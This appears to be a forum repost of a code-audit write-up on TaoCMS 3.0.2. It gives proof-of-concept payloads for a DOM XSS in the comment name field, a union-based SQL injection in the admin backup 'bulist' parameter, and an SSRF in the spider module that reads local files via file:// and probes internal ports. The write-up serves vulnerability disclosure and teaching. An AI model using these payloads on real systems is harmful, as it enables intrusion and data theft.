PHP代码审计之TaoCMS（SQL注入+SSRF 0day）-外链论坛

nykek5i 发表于 2024-11-3 10:47:15

PHP代码审计之TaoCMS（SQL注入+SSRF 0day）

首发于先知社区
原文链接：
https://xz.aliyun.com/t/12499
原文作者：A2Cai

<h2 style="color: black; text-align: left; margin-bottom: 10px;">前言</h2>
大众好，我是A2Cai
今天给大众带来的是 TaoCMS 的代码审计
这是我审的第1个 CMS，倘若有错误请大众多多包涵
PS: 版本是 TaoCMS 3.0.2，本文审计到的都是我网络上没找到的，均已提交 CNVD。
<h2 style="color: black; text-align: left; margin-bottom: 10px;">前台 DOM 型 XSS</h2>
有点难受的是，我一起始以为这是个存储型 XSS（因此文案是这么来的呜呜呜
结果后面看了下实质是 DOM 型的 XSS...害处一下子降到底了
由于这个漏洞产生的原由是后端过滤不严谨 + 前端直接操作节点属性 引起的
不死心的我又跑去后台看了一下，瞧瞧有无解析...答案是不是定的
因此说防御 XSS 漏洞需要对输入和输出进行防御....
即便传进去 XSS Poc 了亦执行不了呜呜呜呜
<h3 style="color: black; text-align: left; margin-bottom: 10px;">漏洞复现</h3>
首要，点击首页任意一篇文案，这儿就选一起始默认的文案
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrCPE055ibdfJ7dZyUTJlK0KMIcKlUajqk8ens0iapr3kGhDjuAh4LF6IQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
往下拉发掘有个评论功能

<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVr1xwrr8Wbpqp45ibZAEYZZDiaafA5q5RKI4qaYahL0OIJwy4tib3z0ylUg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
依次填入以下poc：
姓名：aaa)+alert(1)+(
邮箱：www.gdit.edu.cn@qq.com
网址：www.baidu.com
验证码：按需求输入
评论：随意
而后点击提交评论
看到上面被插进了用户的留言，而后点击回复
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrJnCOuCXCAlgibjNqCtZk0A50oxzRpaQ5pk11ExKrRia8GkkSFOLcwgug/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
发掘 XSS poc 被触发
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVruyNicsmdgAOb2pfGSfibxUg4I4TJBhJASJpWoRN1Po3IQibk2y3QKqUHw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<h3 style="color: black; text-align: left; margin-bottom: 10px;">代码审计</h3>
这儿的功能在 Model/Comment.php 下被实现
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrIvNAHXCia6jpeDg5wPoZsSN5eoDSNqxsrmMWM5HhibjIIR11as3hrNog/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
经过抓包，咱们能够看到姓名这个的参数名是 name
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrIvNAHXCia6jpeDg5wPoZsSN5eoDSNqxsrmMWM5HhibjIIR11as3hrNog/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
在代码中不难发掘，name 参数是运用 safeword 办法进行了两次过滤处理
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrPFickpFSoU18AFJA9uOjENnqib3yep6Dpm4rIe1RPDMEZDk5Z1IcaGoA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
跟踪到 safeword 办法
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVr48mqz0MdP7Nhh8zzL6ianqgNicV4M4O6ps7zd0DSnKOCL3LGCEmiaYQvQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
 level 3 和 level 5 两个等级的 safeword 办法对传入的字符串进行了以下处理：strip_tags 去除所有 HTML、XML、PHP 的标签。htmlspecialchars 把预定义的字符转换成 HTML 实体。nl2br 把字符串中的 \n 转换成 。但这种过滤防护忽略了一种状况：
便是当用户的输入会被插进在 HTML 标签的属性时，该过滤办法将完全失效。
回到前端代码，F12 定位到回复的这个超链接中
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrajtaiaIFq6a3aYiasmqssqh7sXCpNo7FWv4SWcibzInVzlP2t2Wxb5Oyw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
定位到 backcomment 函数
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrajtaiaIFq6a3aYiasmqssqh7sXCpNo7FWv4SWcibzInVzlP2t2Wxb5Oyw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
发掘它是简单拼接后就直接给节点赋值
正常情况下，用户自定义的名字，会被插进到 backcomment 函数中被两个单引号包含起来
咱们能够经过 ) 来逃逸 backcomment 函数的范围
因为是 return，因此即便有分号亦不会再往后执行
咱们能够经过 + 对 return 的内容进行拼接，就变成下面这个样子
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrajtaiaIFq6a3aYiasmqssqh7sXCpNo7FWv4SWcibzInVzlP2t2Wxb5Oyw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
最后点击回复就可触发 DOM XSS
<h2 style="color: black; text-align: left; margin-bottom: 10px;">SQL 注入</h2>
<h3 style="color: black; text-align: left; margin-bottom: 10px;">漏洞复现</h3>
因为这个漏洞点是直接审的代码
因此亦就没这么多过程了
直接上 PocGET /admin/admin.php?action=datastore&ctrl=create&bulist=admin+where+id=1+union+select+(user()),2,3,4,5,6,7,8 HTTP/1.1Host: phpcode.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://phpcode.com/admin/admin.php?action=datastore&ctrl=displayCookie: PHPSESSID=ecfspc92npb6f3napn1j1c11l1; tao_dig27=1682952434Upgrade-Insecure-Requests: 1
响应包：
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrdNTb2XZs9p93D03lldic9jUicCzjLqWC41qkzLHROzEofxcJ6HmAeGCw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
不外后面还是稍微翻了一下
功能点在这儿
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrhGHWEFTZ2Skric9XJCuDiaHJtibUCOic1Z1W1qmhXldS5sXjw5friaXib1Sg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
又稍稍上 CNVD 看了一眼，好似无人和我提交同样的（亦可能是没公开
PS：我怎么晓得的呢？由于我是直接上 github 翻这套 CMS 的 issue 的，里面有漏洞仔细的信息。
<h3 style="color: black; text-align: left; margin-bottom: 10px;">代码审计</h3>
功能实现掌控器在 Model/Datastore.php
漏洞产生点在 create 办法
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrh22ia7ge2tSc73gDdORoTRic9TVmYrkYj0kbTvJ7FMSZkl31rXoB0ibYA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
这段代码的规律，大体上是经过 GET 获取 bulist 参数的值
对 bulist 参数的值进行分割，而后分批读取数据库内的所有表的所有数据
并写入到 backup-xxxxx.sql 中供用户下载
简而言之，便是一个数据库的备份功能
但这儿并无对 bulist 的值进行任何过滤，就插进 "select * from " 后面而后执行
最后会引起 SQL 注入的出现
Poc：http://xxx.com/admin/admin.php?action=datastore&ctrl=create&bulist=admin+where+id=1+union+select+(user()),2,3,4,5,6,7,8
重视：
Referer 的值要为
http://xxx.com/admin/admin.php?action=datastore&ctrl=display 
,否则会没法执行。
<h2 style="color: black; text-align: left; margin-bottom: 10px;">SSRF</h2>
<h3 style="color: black; text-align: left; margin-bottom: 10px;">漏洞复现</h3>
实战从没利用成功的 SSRF 最终让我代审给你捕到了
人麻了，人与人之间要是多点信任，少点防火墙那该有多好啊
下面是漏洞复现
登录后台，进到这个页面
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrcwzNbjduEmLnGXexribcz5vcUSmnYYuuDrrkvO7nQ9zdI3aHxqxU76Q/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
而后更改为以下配置
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrMdzUVbYUBQ0sibsjHkYtMDlniaDUBNQ5U6q8fQcVvkGCic0OJba10cZlg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
点击起始采集
<img src="https://mmbiz.qpic.cn/mmbiz_png/yzsHc8qARCxPzGdzoiak5SetPJ0xDdaVrNbrrpiaCqjJC3Q2DM141UibpjhL8cmbgdN99afQtpib6LO5qYqMVZkNmA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
这个时候倘若抓包的话，会发掘是服务端返回的信息
而不是客户端发起的请求，因此是个 SSRF
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
而后尝试 file 伪协议读文件
Poc：file:///D:/1.txt?
重视：? 号必定得带，至于为啥看后面有讲
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
尝试探测端口
Poc：http://127.0.0.1:3306/?
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
<h3 style="color: black; text-align: left; margin-bottom: 10px;">代码审计</h3>
这次漏洞点在 Module/Spider.php 的 execute 办法
定位到 execute 办法（代码有点长我只截图关键的...
发掘有个可能有问题的办法 fetchurl
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
定位到 fetchurl 办法，如下图所示
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
发掘便是传入一个链接，而后直接拖取数据的办法
这种倘若无对传入的链接做出限定的话，很可能会引起 SSRF 漏洞
此时候能够往回瞧瞧，瞧瞧 fetchurl 传入的三个参数可不可控，有没被过滤
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
发掘无任何的过滤，那就可以说尝试瞧瞧 SSRF 了
不外接下来还要思虑下是不是能输出...继续看下去
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
这一段的规律是：看下指定的编码是不是 UTF-8，倘若不是就转换。运用 preg_match 去获取符合正则的内容，放到 titlearray 数组中，并将其赋值给 data["name"]。最后打印 data["name"] 的值。因此到了这儿，问题就变成为了 “怎样让获取的内容符合正则表达式呢？”
这儿会发掘说，诶这个 titlepreg 的正则是哪来的？
往上翻会发掘有个 createpreg 的办法，定位到这个办法看下
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
下面是定位到的 createpreg 办法
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
发掘这个办法其实很简单，便是字符串替换而后返回个正则表达式吗
按照前面的代码能够晓得，name 参数的值是被写死的，咱们可控的是 preg 参数的值
咱们最后的目的是为了让它返回所有的内容吗
因此结合 return 后面的值来看，咱们只需要传入 .* 就可
但这儿还要重视一个点，便是 preg_match 这个函数
当你传入第三个值的时候，就会将搜索结果填充到第三个参数中
因此前面的正则表达式还需要加上 () 才可有搜索结果
最后得到的正则表达式便是 (.*)
而后找到调用这个办法的业务点（懒得拼接参数
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
开代理抓包：GET /admin/admin.php?front=http%3A%2F%2Fwww.baidu.com%2F%3F&start=1&rend=2&back=.htm&each=2&basecode=utf-8&titlepreg=%28.*%29&contentpreg=%28.*%29&cat=0&repword=%E7%AC%91%E5%98%BB%E5%98%BB%7CtaoCMS%0D%0A%E5%BF%AB%E4%B9%90%7C%E9%AB%98%E5%85%B4&llink=1&action=spider&ctrl=execute&Submit=%E5%BC%80%E5%A7%8B%E9%87%87%E9%9B%86&test=1 HTTP/1.1Host: phpcode.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://phpcode.com/admin/admin.php?action=spider&ctrl=displayCookie: PHPSESSID=ecfspc92npb6f3napn1j1c11l1; tao_dig27=1682952434; caf_ipaddr=3.0.92.142; country=SG; city="Singapore"; expiry_partner=; __gsas=ID=a4732952401d9990:T=1682933879:S=ALNI_MZCN7IrRihmqjkL4o8N7JGsDAxHwQ; pvisitor=c0664828-e038-4d7c-b430-bff02e4113ddUpgrade-Insecure-Requests: 1
后面就大差不差了，详细的都在上面漏洞复现里展示了
就还有要重视的一个点...
是运用 file:// 伪协议去读文件的时候，需要在末尾加个 ? 号或 # 号
由于它这个采集数据的时候，会拼接数字做为采集的范围
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
urlback 参数能够为空，但 i 参数必定是个整数
因此要用 ? 或 # 去注释掉后面拼接的数字
Poc：file%3A%2F%2F%2FD%3A%2F1.txt%23

nykek5i 发表于 2024-11-3 17:29:14

楼主发的这篇帖子，我觉得非常有道理。

j8typz 发表于昨天 03:52

一看到楼主的气势，我就觉得楼主同在社区里灌水。

页: [1]

外链论坛's Archiver

PHP代码审计之TaoCMS（SQL注入+SSRF 0day）